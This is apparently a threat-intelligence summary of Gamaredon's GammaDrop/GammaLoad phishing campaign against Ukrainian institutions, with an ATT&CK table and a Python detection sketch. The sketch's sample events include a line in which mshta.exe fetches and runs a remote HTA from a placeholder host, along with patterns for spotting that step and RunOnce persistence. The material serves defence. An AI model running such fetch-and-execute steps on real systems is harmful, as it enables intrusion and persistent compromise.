EXECUTIVE SUMMARY
Gamaredon's threat campaign targets Ukrainian state institutions with the goal of data theft. Its phishing emails, often spoofed or sent from compromised government accounts, deliver persistent, multi-stage VBScript downloaders that profile the infected system. The attackers' ultimate goal is to steal sensitive information, and the campaign has been ongoing for several months, with new waves emerging at a roughly monthly cadence. The threat actors behind Gamaredon have been exploiting the CVE-2025-8088 vulnerability.
The malware infection chain begins with a spoofed email, which delivers a RAR archive containing a VBScript payload, GammaDrop. This payload fetches a remote HTA file, GammaLoad, from a Cloudflare Workers C2 server and executes it. The HTA file establishes persistence via a RunOnce registry key and beacons victim data to the C2 server, enabling the operator to selectively deliver a tailored payload. The malware also uses a unique, redundant path traversal pattern to bypass WinRAR path traversal mitigations.
Once inside the system, the malware establishes persistence and beacons victim data to the C2 server, allowing the attacker to selectively deliver a tailored payload. Gamaredon's tooling is auto-generated and parameterized per wave, producing samples that vary in their communication parameters with superficial code changes that preserve the same underlying functionality. However, the payload delivered via GammaLoad appears to be operator-controlled and is not automatically served. The attackers have been using a unique, redundant path traversal pattern to bypass WinRAR path traversal mitigations, making it difficult to detect the malware. The campaign has been ongoing, with new waves emerging at a roughly monthly cadence, and organisations should be on high alert to prevent a potential breach.
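As an added illustration (not code from the original report), the following Python detection sketch flags the stages of the chain described above in constructed process-creation and registry events: a script host spawned by WinRAR, mshta.exe fetching a remote HTA, and a RunOnce autostart value written by the script host or mshta. The event tuple layout, the placeholder workers.dev host and the archiver/script-host name lists are assumptions.

```python
import re

# Constructed sample events (hypothetical Sysmon-style records, not real telemetry).
# Format: (event_type, parent_image, image, detail) where detail is the command
# line for process events and the target key for registry events.
SAMPLE_EVENTS = [
    ("process", r"C:\Program Files\WinRAR\WinRAR.exe", r"C:\Windows\System32\wscript.exe",
     r'wscript.exe "C:\Users\user\AppData\Roaming\report.vbs"'),
    ("process", r"C:\Windows\System32\wscript.exe", r"C:\Windows\System32\mshta.exe",
     "mshta.exe https://placeholder-worker.workers.dev/load"),  # placeholder host, not an IoC
    ("registry", "", r"C:\Windows\System32\mshta.exe",
     r"HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce\Update"),
    ("process", r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe", "notepad.exe"),
]

ARCHIVERS = {"winrar.exe", "7zfm.exe", "7z.exe"}          # assumed archiver binaries
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}             # Windows Script Host binaries
RUN_KEY_RE = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce(\\|$)", re.I)
REMOTE_HTA_RE = re.compile(r"\bmshta(\.exe)?\b.*\bhttps?://", re.I)

def _base(path):
    """Lower-cased file name of a Windows path (empty string for missing parents)."""
    return path.rsplit("\\", 1)[-1].lower()

def analyze(events):
    """Return (technique_id, description) for every event matching one stage of the
    GammaDrop -> GammaLoad -> RunOnce chain; unrelated events produce nothing."""
    findings = []
    for kind, parent, image, detail in events:
        img, par = _base(image), _base(parent)
        if kind == "process" and par in ARCHIVERS and img in SCRIPT_HOSTS:
            findings.append(("T1059.005", f"{par} spawned {img}: script run straight from an archive"))
        elif kind == "process" and img == "mshta.exe" and REMOTE_HTA_RE.search(detail):
            note = "mshta.exe fetching a remote HTA"
            if ".workers.dev" in detail.lower():
                note += " from a Cloudflare Workers host"
            findings.append(("T1218.005", note))
        elif kind == "registry" and img in SCRIPT_HOSTS | {"mshta.exe"} and RUN_KEY_RE.search(detail):
            findings.append(("T1547.001", f"{img} wrote a RunOnce autostart value"))
    return findings

def full_chain_observed(findings):
    """True when all three stages (script drop, remote HTA, RunOnce persistence) were seen."""
    seen = {tid for tid, _ in findings}
    return {"T1059.005", "T1218.005", "T1547.001"} <= seen

if __name__ == "__main__":
    for tid, desc in analyze(SAMPLE_EVENTS):
        print(tid, "-", desc)
    print("full chain observed:", full_chain_observed(analyze(SAMPLE_EVENTS)))
```

Each stage alone is a weak signal; the chain check is what separates this activity from a lone administrator running an HTA.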
THREAT PROFILE:
| Tactic | Technique ID | Technique | Sub-technique |
|---|---|---|---|
| Resource Development | T1583.003 | Acquire Infrastructure | Virtual Private Server |
| Initial Access | T1566.001 | Phishing | Spearphishing Attachment |
| Defense Evasion | T1218.005 | System Binary Proxy Execution | Mshta |
| Execution | T1059.005 | Command and Scripting Interpreter | Visual Basic |
| Persistence | T1547.001 | Boot or Logon Autostart Execution | Registry Run Keys / Startup Folder |
| Defense Evasion | T1564.004 | Hide Artifacts | NTFS File Attributes |
| Defense Evasion | T1027 | Obfuscated Files or Information | — |
| Initial Access | T1078 | Valid Accounts | — |
| Discovery | T1082 | System Information Discovery | — |
| Discovery | T1047 | Windows Management Instrumentation | — |
| Command and Control | T1071.001 | Application Layer Protocol | Web Protocols |
| Command and Control | T1008 | Fallback Channels | — |
REFERENCES:
The following report contains further technical details:
https://harfanglab.io/insidethelab/gamaredon-gammadrop-gammaload/